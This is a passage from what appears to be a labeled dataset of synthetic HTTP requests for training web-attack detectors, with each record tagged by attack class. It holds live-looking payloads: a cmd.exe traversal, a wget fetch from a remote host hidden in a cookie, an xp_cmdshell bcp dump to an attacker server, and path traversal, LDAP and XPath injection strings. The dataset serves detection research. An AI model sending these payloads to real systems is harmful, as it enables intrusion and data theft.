~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44078
Start - Id: 44113
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.hS7ftos.fr
Connection: keep-alive
Accept: audio/x-wav, audio/x-wav;q=0.0, audio/basic;q=0.9
Accept-Charset: x-mac-hebrew;q=0.0, euc-tw;q=0.3, iso-2022-kr;q=0.2, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 249.225.32.40
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="74"
Date: Tue, 16 May 06 12:46:11 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Wed, 23 Sep 09 14:49:37 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 4
MIME-Version: 5.1
Pragma: conk='t2'
Proxy-Authorization: Basic ZTA4aG86eWVvZA==
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 827-
Referer: http://lhod.com/cnthqm/ienh0/ewdnge/ijeh/wt7q.nsf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: xSsnar/8.0.5.6.8
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 378 196.189.21.245:66 "hoiooiLnwuhilt51e" "Sun, 15 Jan 06 06:34:10 UTC"
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44113
Start - Id: 45694
class: PathTransversal
GET /iS.dll?selectmAV=Lioelike%7C%3BMbmochav2%2Bb+0f&aeaeikcct=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&td=Cyp%5C&nrLautihct=r%3ErI%40j&qars1d3tmHs=476849835&stOo=eu8siu&LituSr=voeaau7s HTTP/1.0
Host: www.tatGwr6.org:2
Connection: keep-alive
Accept: text/plain;q=0.0
Accept-Charset: windows-1252
Accept-Encoding: *
Accept-Language: Xs-luh, en5iytW-rl, Oonmsycx-r4oleh, penicaE-edo
Cache-Control: min-fresh=0506
Client-ip: 24.162.161.227
Cookie: esuos=1t1hen6rmd;DTvSTM-=uaws;scasen1on=7269679;d8aVaaaoz=fynxEDoDxWG;s5e2H1eehs=5 hghttp)t|h
Cookie2: $Version="441"
Date: Fri, 01 Apr 05 01:57:14 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: 100-continue
From: esIpsioy@eehlxsang.it
If-Modified-Since: Wed, 01 Jun 05 04:33:33 GMT
If-Unmodified-Since: Fri, 10 Jun 05 04:46:25 CET
If-Match: *
If-None-Match: *
If-Range: "uI3J2d3rGW5NAp2fMVa-"
Max-Forwards: 1
MIME-Version: 5.2
Pragma: mCsstzas='lts'
Proxy-Authorization: Basic eGdyblIyQUU6bnRTZQ==
Authorization: Basic N2FlcGkxZW86d2c3Y3Vv
Range: -934,-807,-703421
Referer: /gdfe.asp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.9 (Windows; U; Win98 5.8; 2h-io; rv:5.9.9) Gecko/70597008
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6938x271
Via: HTTP/1.3 www.eapop.jpg:65, mc3/1.1 157.220.38.46, 1.6 www.tna7l.gif
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45694
Start - Id: 36737
class: OsCommanding
GET /hQ/adm2hnmireor5hg/3passwdFG9dAMl/oYA-Rxx/i8r1gtk0eA73axhNe/kr/9THLhdhVwp-My/4r/dl.swf?seU=1aonhecanOeni&sG3gioeeo=uEl_01IOpgB&Tre=784&egti=roetch%7C&idrisoif=e&tostearhbA=mail+++++aly1%40ierd.evstinp.gov+++%3C%3C+++%2Ftmp%2Fwu.c+++%3B&deadajtrWatiilC=positiondayihlsA&esryeYhobhhemgr=%3E%2B&ondee4thzisO0t=nlL&1if9=93628974&ra2edt=+noded%3De HTTP/1.0
Host: www.Eto6so9nh.biz
Connection: inaeEp
Accept: */*
Accept-Charset: iso-8859-5, x-mac-arabic, cp-950
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 71.77.69.175
Cookie: Ettra=5;hNsWLxtlrs6h=8;nAaeekcme0eu=7597;csasnsai=6ajtmrzwmtoaqyYyyh;JGy-5obetween=BYc
Cookie2: $Version="79"
Date: Fri, 30 Nov 07 07:34:19 UTC
ETag: W/"KQH1Ph8SYsJZUWFBCG"
Expect: 100-continue
From: 9rrtotci@rtshul.org
If-Modified-Since: Wed, 10 Mar 04 19:05:28 CET
If-Unmodified-Since: Tue, 25 Jul 06 03:08:30 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Dec 09 06:09:09 GMT
Max-Forwards: 37
MIME-Version: 3.9
Pragma: ipi='n8a1Z'
Proxy-Authorization: it0a ison5ofO=srsyk
Authorization: Basic b3J0c3Q2aDpqY3NlbUx0eQ==
Range: -47510,582-0
Referer: http://www.ntpwoyn.biz/fToaMeon/lstu/iber.shtml
TE: trailers,trailers,deflate
Trailer: From
User-Agent: Mozilla/0.4 (X11; U; Linux i386 2.1; dn-en; rv:8.5.4) Gecko/32499775
UA-CPU: Sparc
UA-Disp: 8267,5613,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 402x4966
Via: FTP/6.4 www.erondnt2.tiff, 8.5 www.aOnqi.shtml
Transfer-Encoding: deflate
Upgrade: rss8so/4.4, hNo/7.8, dfee/8.1
Warning: 867 151.26.59.212 "etraSdoEtTi83ctsms0" 
X-Forwarded-For: 246.253.133.9
X-Serial-Number: 5966336
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36737
Start - Id: 42953
class: OsCommanding
GET /uoThfOthV8ewrt.jsp? HTTP/1.1
Host: www.3eggaeuo.be:84
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-4;q=0.7, iso-8859-6;q=0.4
Accept-Encoding: *
Accept-Language: k6itg7mh-cmtlmwl, dhilii-mhbsamo;q=0.9
Cache-Control: min-fresh=18448
Cookie: PtHh=79;zArq=7797137381;maHmae=|tdrjwe|znRo;weAZnHe8N2i=fprh8a4a6>;zfp="   ;    /usr/bin/wget   www.llneenli.com/ra     ;;gtieew=Seerctuoe
Cookie2: $Version="940"
Date: Wed, 30 Jun 04 01:10:37 UTC
Expect: e9nsomb
If-Modified-Since: Mon, 28 Apr 08 04:13:12 UTC
If-Unmodified-Since: Sun, 07 Sep 08 21:57:25 CET
If-Match: *
If-Range: Tue, 30 Dec 08 21:14:15 CET
Max-Forwards: 375
Authorization: Basic c2l0dHQ6bzlzcg==
Referer: /y2at/h1rnpM/Aoenk9o.msf
TE: trailers,deflate,deflate
User-Agent: v68s6M http://www.raktihmp.uk
X-Serial-Number: 61844777851149427
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42953
Start - Id: 37834
class: LdapInjection
GET /Zhaeli/syAavasin/vLhUQr72iQ0LzXwHhQ/ulhiseO/icl7lzCrsnceseod/tue/gw_4/u6qWbpT91CCfPDU/6_pSuGsZ_1DW/otyhtt1/su-f9Zyl@pmS04.pNRh.exe?xde=145&l2mrv3=117&eshhcuitopesana=EEnb0ca+S&sF44Pis=nIirnMEdl&la=nc1%29%28%26%28objectClass+++%3D++da*%29&wlrA2tUeU86sir=773716&hte=398628001&rdj5rywXnhstsml=37 HTTP/1.1
Host: www.sEacrtd.org:80
Connection: hsyotap
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: cso='ul9oe'
Client-ip: 145.59.192.187
Cookie: rs=830630;Sintm7ureatte8u=oaa3XE42s;codrhlanoTo=ni1TbjWrnte
Cookie2: $Version="4"
Date: Mon, 27 Jul 09 07:01:29 CET
ETag: W/"7bZNocxT.N2HZG9O"
Expect: 100-continue
From: tlocso@Staohr.gov
If-Modified-Since: Sun, 29 Apr 07 18:35:43 UTC
If-Unmodified-Since: Mon, 01 Oct 07 17:16:32 UTC
If-Match: "6LDVJKbY8NZaxk.pXUk"
If-None-Match: "__vM8@93Slw96AX_m9"
If-Range: Tue, 09 Oct 07 19:41:01 GMT
Max-Forwards: 5985
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic MWU3Ym9hOmx0ZWllam8=
Authorization: Basic YVJ1ZWM2Om9ybzQ=
Range: 853418-,-430
Referer: /me7ee/itaht.cgi
TE: deflate,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/9.4 (X11; U; Open BSD i386 8.9; dw-r4; rv:2.5.7) Gecko/05361043
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.3 45.222.142.197:20586, 3.9 90.234.17.249:824
Transfer-Encoding: compress
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37834
Start - Id: 41024
class: SqlInjection
GET /n1pLp5fW/6mileUwateciatesBtn/thSb/jservicesa04divN/Mk9DO_V/@-3GFnqf9DkW_Uq/iSmW42.png?stfwaqn1=65755&8Soycormxhe=7345&sjraDkl=%5Di%40eaa4gede+ivaaoh&dhsa1qboal=76693609&ctasts3meh=297787302&eesnriirehieiW=woiievalor+&NAB27M=2&wzYzmail1w_Gw=9&lzt00yf=058516433&8gan=lesguian&sQ5bFw4YdAwO=gK1vlSV3qZW&n3ieeFyzptShst=%5Dig&TiZt6fe1Tia=exec+xp_cmdshell++++%27bcp+++++%22select++*+++from++caNT%22++queryout++pwdump.exe+++++-c+-Craw++-Shackersip++++-Usa+++++-Ph8ck3r%27 HTTP/1.0
Host: 170.184.22.34
Connection: close
Accept: */*
Accept-Charset: big5;q=0.3, windows-1255, x-mac-korean;q=0.0, x-mac-turkish;q=0.2
Accept-Encoding: 
Accept-Language: Edsatag-s, Ube-hRhghst;q=0.0
Cache-Control: g8Hsn0f='dgn5l'
Client-ip: 81.246.100.20
Cookie: ihdaeq=Aneaegol@f;sot0dht=82920
Cookie2: $Version="52"
Date: Sat, 08 Jan 05 19:45:14 UTC
From: spbhn@ispeCheey.net
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Tue, 13 Jan 04 14:34:07 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 6
MIME-Version: 5.6
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: lIainj 9eeoiltf=seddibai
Range: 770-,-93926
Referer: http://GEdEcoo.gov/hTgo/sseTfre.jsp
TE: trailers,trailers,gzip;q=0.9
User-Agent: sSd8Q7bYqE http://www.slhno.gov
UA-Disp: 3796,7783,32
Via: FTP/2.4 www.hdylu.htm
Transfer-Encoding: deflate
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41024
Start - Id: 50050
class: XPathInjection
POST /x75R@PRjD/DBINC8fromjsMM-4/ctjUozotVw/ljoenh/tRffarrritwffro/AizP/i3hrsv6EtpdwdTvr1hf/gGw0tU/eXm.js? HTTP/1.1
Content-Length: 18
Content-Language: reetsLf,6u,eme
Content-Encoding: gzip
Content-Location: /TteSa/i47bCo/cuesr/caihcepo.mpeg
Content-MD5: N3JhdDhlTG5kTGExa3JqdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Jun 05 21:32:06 CET
Last-Modified: Fri, 25 Mar 05 22:58:59 CET
Host: 82.55.188.8
Connection: edtt
Accept: application/zip;q=0.2, audio/*;q=0.6, image/jpeg
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.8, deflate, compress, compress;q=0.3, identity;q=0.7
Accept-Language: *
Cache-Control: OI=24ion
Client-ip: 206.92.192.40
Cookie: rrcevgi7tdmfiRa=euamilc5dNRooga;yexadMsLmld=wL9Z;te=Xti']  |   P  |    //user[   name/text()  = 'ac;hmemhlisrec=5264005962
Cookie2: $Version="478"
Date: Sun, 17 Jan 10 06:25:22 CET
ETag: W/"whg3SxI5KGPRszjop"
Expect: ziee=5mom;eeregi=eeeeil
From: rffjOIp@Tenah9e.be
If-Modified-Since: Sun, 10 Aug 08 23:24:54 CET
If-Unmodified-Since: Fri, 26 May 06 13:10:23 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Apr 09 06:47:51 CET
Max-Forwards: 3011
MIME-Version: 0.4
Pragma: elntlEx='s'
Proxy-Authorization: Digest nc=6d2CdE8f
Authorization: NTLM Zm9DY3hzY2Fucm5kYWhpbmVuY241c2V5Q3NhdGx5ZWVjbGk3aGE=
Range: -59071,-7
Referer: http://www.43erstn9.com/thln8oa/aa4r0/ldc2am/yhde/bisaseu.asmx
TE: deflate;q=0.6
User-Agent: rshaea/7.5.8.6
UA-CPU: PowerPC
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3705x532
Via: FTP/4.7 90.87.13.66
Transfer-Encoding: gzip
Upgrade: emh/5.8, lDnqa0/1.8
Warning: 331 133.140.170.207 "tenopilr" "Fri, 29 Jul 05 19:30:07 GMT"
X-Forwarded-For: 165.157.255.143
X-Serial-Number: 4431106659344342
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

n6twAnhimi7=383268

End - Id: 50050
Start - Id: 44991
class: PathTransversal
GET /nQkPhHO0/ae-eW/aeAssok2atiS/tdahedeNrs/ndaRnni5avalotn1dtz/fa/oahecogzexisrhi/omU0rYw9HXNwYV5m/eewNnoo7iaaeswa/tdlitaNrnuotcs/snIiur_AMZL1Y.js?etnoavaFr=f&lihkccfaotCoj=s6n&ttn=wnp&7q=0955868&psRwlrhgi=81730802&rqedotac3R=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&OVinputbzoHa=bxVXudGw&hmtpt9lp=gnAieeeEedahskRh&eg=jlntu%25e&hsodeeeXt=n4tcsse3e&F8ndfeo3m2Oie9t=tl%25%3B HTTP/1.1
Host: 181.193.98.16
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.4, deflate, identity;q=0.1, identity;q=0.5
Accept-Language: rtoEcapn-Oiwnoobe, 4oha-trncaEl;q=0.3, dyd0od-ohee;q=0.1, s-c2rhm;q=0.6
Cache-Control: only-if-cached
Client-ip: 223.133.197.156
Cookie: srsgwwpdnhlpuoT=817;smno1=eeSix8idNa;edgsuw=9mt'$ci;wd0mci=80d@PzeYEHEM;coyi3ue=28993637
Cookie2: $Version="8"
Date: Thu, 04 Mar 04 10:40:06 UTC
ETag: W/"K3wowyZow_Ffh6Twf9et"
Expect: 6hrggat=sokslz
From: d1afcs@ehhqe5r.cz
If-Modified-Since: Wed, 14 Apr 04 20:14:10 GMT
If-Unmodified-Since: Wed, 12 Apr 06 15:04:10 UTC
If-Match: *
If-None-Match: "S-p7FhX-8yUyfWK"
If-Range: Wed, 01 Feb 06 07:21:22 GMT
Max-Forwards: 5836
MIME-Version: 8.3
Pragma: aaeefew='jbwsitm'
Proxy-Authorization: Basic ZW5sdGlvTnU6aDV0cG5l
Authorization: Basic c0FuUE5BbDo5ZXBpcnRh
Range: -724
Referer: /Ttam/had9e/eYsetcg.jpeg
TE: deflate,chunked,trailers
Trailer: Accept-Encoding
User-Agent: hworn/5.9
UA-CPU: 68000
UA-Disp: 810,5138,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x3014
Via: HTTP/1.1 www.1Iai.htm
Transfer-Encoding: deflate
Upgrade: 2sihh/3.3, x4nlo1/8.6, M1u/8.1, escfn/6.3
Warning: 947 104.115.69.47 "thhtcs4" "Tue, 22 Jul 08 21:19:00 GMT"
X-Forwarded-For: 235.153.99.79
X-Serial-Number: 991492175828
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44991
Start - Id: 49123
class: XPathInjection
GET /5XYUxiw@7QPb/l.C5edwpdXy-k8CiDJ/hL7Sma4ViE7anUJ/suauHyee/AXqGWjwQ6.jsp?CemalouYlnvrb=htoa4&5wp-@RBl=eroGEER3M&den=6670328&eAxrC=aksCatst%27+or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+%27iRirmda5%27%3D%27&n1etnwaetoatsSN=aAaNqAdkhd HTTP/1.0
Host: 202.62.14.68
Connection: fsANikEh
Accept: video/*;q=0.9
Accept-Charset: windows-1250;q=0.8
Accept-Encoding: compress, gzip;q=0.9, gzip, compress;q=0.8
Accept-Language: *
Cache-Control: max-age=64851
Client-ip: 194.231.244.174
Cookie: inmNrUhiiIt7ed=ktmp)ss%eobject|ssdsnb=oy>;wgetrApMiconnectK=iesx
Cookie2: $Version="54"
Date: Fri, 23 Apr 04 16:49:56 CET
ETag: "vPp0o9iOZjK@583"
Expect: 100-continue
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Thu, 20 Jul 06 07:50:28 GMT
If-Unmodified-Since: Sun, 09 Oct 05 14:08:05 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 098
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: ytlho yeIeadNe=sot5x
Authorization: 4dqt csae2edi=scth
Range: 245-5,78-,7820-
Referer: http://rsro.de/9hsSooe/ioiau/eai1d.mpg
TE: gzip;q=0.4,chunked
Trailer: Host
User-Agent: n8dhadS8o/2.1.6
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 468x973
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 604 www.ofriesai.html "lf1behhu" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 0092197
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49123
Start - Id: 38678
class: LdapInjection
GET /usrki/boro3l/cqLxgC/o9h9IyEJoeS9dXDp.cgi?eyhht=hbtSeohnejt1hl&kvqunion=4&snte5It=vNrq7ei7us&Aooznoabst6ie=gn%25e+8l&oagoiaADsea=o&oejq1=6233&ewnadMf=nrst-nonnys%29t&ak=Ldszshomtelnetnbla&ielw6vqahEtN=%29++++%28%7C+%28v45t%3Dtmn*%29&LXknfe=eoOr&.fZWuSallne-=1&upiuscteaca=6AO HTTP/1.1
Host: 89.206.249.29:80
Connection: tioesh
Accept: application/*, image/png;q=0.8
Accept-Charset: x-mac-greek;q=0.0, iso-2022-jp;q=0.5, x-mac-chinesetrad, us-ascii;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 64.190.230.209
Cookie: w9valaihrii=lSg aueRnetcatf;qVVmQ=arqclefttk3hhm4et;igsZtpa6=b?u;uh3tafnauG0co=Ftui;6onueehnmaifty=sGo2jI3a0ZfX;teneog=aguia ot E
Cookie2: $Version="37"
Date: Sun, 06 Aug 06 03:17:33 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: 100-continue
From: 0dbnE@pDEweao.biz
If-Modified-Since: Sun, 06 Mar 05 05:02:56 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "rUVgjv4c3YPIvHvL-bYf"
If-Range: *
Max-Forwards: 2608
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic bUl3MTppZGVsaXVl
Range: 39622-,-9614,-81153
Referer: http://sus9wkV.st/slAccu.swf
TE: chunked;q=0.0
Trailer: Transfer-Encoding
User-Agent: ru_qCkMIDB http://www.gcgd.uk
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3881x3799
Via: FTP/1.7 117.109.23.73, 0.5 www.0rni.tiff
Transfer-Encoding: tcmPi
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 0.228.238.16
X-Serial-Number: 7677444389981478018
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38678
Start - Id: 44059
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.sxmt.it
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-age=61820
Client-ip: 11.19.174.55
Cookie: Ew2ttiht=tb;aNftscfg=passwd 8;orssn=l oK|nzLtege1lys;odEseP9=3;PwherehdjH=iiirnetcat ar;cV_nppX=loLev
Cookie2: $Version="43"
Date: Wed, 24 Sep 08 14:29:42 CET
ETag: W/"3JMdpZKPsFZtfWe4VBfh"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Sat, 29 Oct 05 24:14:28 CET
If-Unmodified-Since: Sun, 11 Jan 04 07:13:57 UTC
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: "XIdU6YFkNmv.RQLm9@"
Max-Forwards: 982
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: haih yoils=Rrfosi0
Range: -0
Referer: /ytMz.avi
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.9 (compatible; Konqueror/0.4; SunOS sun4u; ea9hA0N; ceyp)
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: FTP/0.0 20.93.153.238
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 33.218.49.141
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44059
Start - Id: 37454
class: LdapInjection
GET /n1X5s1n/ypO._u-f./uaide/gLEGBzHIIPqgmxDw/bnt6dtuafptfeymeehyb/tfosdnreryrbotnf7rk/At1SeSreplaceW.F_6V/nDasnwbt4ibeee/nTncr5jht1rc/ess.js?xujgL4taeElshni=tayrio+t5-he&httpsiFEn=ija&o6rioe16h=veje9aavshnyf&X0LLiz61ZJ-=53551382&1jnuuyo5Lge0=Sidrioopee7styleeh HTTP/1.0
Host: www.ef7O.uk
Connection: euda2o
Accept: */*
Accept-Charset: windows-1254, windows-1251;q=0.2, koi8-r, koi8-r;q=0.6, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: 4se=oxGN
Client-ip: 131.52.186.179
Cookie: havinghU@Jsystemq=L5raiisrv6raqtaEie;YmQfIbvD6=001435561;pgPperlqJ4GOKXinsert=")(targetfilter=(o=NetscapeRoot));k4ttoitwnl4a=sihrei%lo&n
Cookie2: $Version="16"
Date: Thu, 18 Jun 09 03:58:06 CET
ETag: "jkTUJPFiI2zGOm7"
Expect: enaittw=mxg0
From: cdnol@lztd.biz
If-Modified-Since: Sun, 20 Sep 09 01:30:34 CET
If-Unmodified-Since: Sat, 25 Sep 04 07:47:59 UTC
If-Match: *
If-None-Match: *
If-Range: "JH7gQ6SlirKZ4@EO"
Max-Forwards: 282
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXMxZTV5ZGRpcWhpd295bmhsYXdUZXJlcmFlcDllbmhsU2F0MzJsY3NsaQ==
Authorization: a6uoe undis=ieoyer7c
Range: -85,-288767
Referer: /eeienF/ny9oafwc/t3h2cw/ueee.css
TE: trailers,deflate;q=0.1
Trailer: Connection
User-Agent: Mozilla/2.5 (Windows; U; WinNT 4.2; ei-wh; rv:6.2.7) Gecko/60254195
UA-CPU: MIPS
UA-Disp: 732,386,8
UA-Pixels: 161x1713
Via: 2.4 30.51.135.134
Transfer-Encoding: deflate
Upgrade: oaoaii/1.1
Warning: 096 174.39.85.65 "dibesnanterur8nmCi" "Tue, 31 Jul 07 06:05:07 CET"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37454
Start - Id: 49387
class: XPathInjection
GET /aUloR10k/ni3homez04nW7Sw/nnvGLWczDbO1yFyeT/scleiwrv/operlFWcopyHtmpOR/sosUarubijeton8fdh/3obsoTx2pyssddth2/y5c8wzG/rrEBC7cki0Gi5fDxl/cVWuCTQPPmQ/istc.exe?Ebss6i=rnbi&8a1p0nanosfr=ohetlniaccess_logo&hH=jet4rysdaaTd&ieete9ngiscvl=lHl&oi6ser9tstdoN0u=seoLo7etiriTi&Qewgd9bgsoundA=rTd%2F2u7lu%2Feeioti%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D3%5D+%7C+++as0%2FnsCoa%2Fi5aahn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D763%5D+++++or++++%27mer3x%27++%3D++%27&qc5no=2546080&eodw=868191 HTTP/1.0
Host: www.syjh8i.it:353
Connection: close
Accept: video/quicktime;q=0.1, video/mpeg;q=0.5
Accept-Charset: koi8, iso-8859-15;q=0.6, cp-950;q=0.4, iso-8859-7
Accept-Encoding: identity;q=0.5, gzip, compress;q=0.7, gzip, compress
Accept-Language: miinCid-aucisg;q=0.0, Dled4mJy-liit
Cache-Control: no-cache
Client-ip: 227.191.80.33
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="35"
Date: Sat, 27 Mar 04 14:55:41 CET
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Pmsahe=aeni1iw
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Sun, 14 Dec 08 24:09:48 UTC
If-Unmodified-Since: Thu, 29 Jun 06 01:42:37 GMT
If-Match: *
If-None-Match: "3cQ0DxcbwvtPpZC"
If-Range: *
Max-Forwards: 688
MIME-Version: 7.0
Pragma: t=otihemeu
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: NTLM bWhoaWVkdWZnZWVuZXF3ZXJhdHRjb3NucnNEZnJFd3RlSW9oZWxobGhvYXJqMWFh
Range: -33311,24-
Referer: http://2fpezoEh.uk/rtei/erdetOpu/hnldt/oa8wb.exe
TE: gzip
Trailer: If-Range
User-Agent: Oenm3yup (sLGbQz; 3WLgG56mup)
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: HTTP/8.3 www.hEell.css:410, geeono/2.0 134.247.195.247
Transfer-Encoding: identity
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49387
Start - Id: 37708
class: LdapInjection
PUT /1qq4loewkto8o94/vBayQTOHRz.html? HTTP/1.0
Content-Length: 94
Content-Language: sddwap,toqf,dih
Content-Encoding: compress
Content-Location: /vcst/xroc.jsp
Content-MD5: aG5zcmNvZWhFZWV0M25uTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Feb 08 08:47:11 CET
Last-Modified: Tue, 29 Sep 09 04:35:16 GMT
Host: www.ih4Cio.it
Connection: close
Accept: image/*;q=0.1, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: r-rewN, Deraa-umoiyo;q=0.1
Cache-Control: no-transform
Client-ip: 11.82.10.207
Cookie: daestreLitiv=q;Eo=mhneIeaser;snoteeeprngtBw=4o5aa7gvtaneeleo
Cookie2: $Version="321"
Date: Mon, 18 Jul 05 09:53:41 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 6bsr5le=isoccne
If-Modified-Since: Thu, 30 Sep 04 06:12:22 GMT
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: *
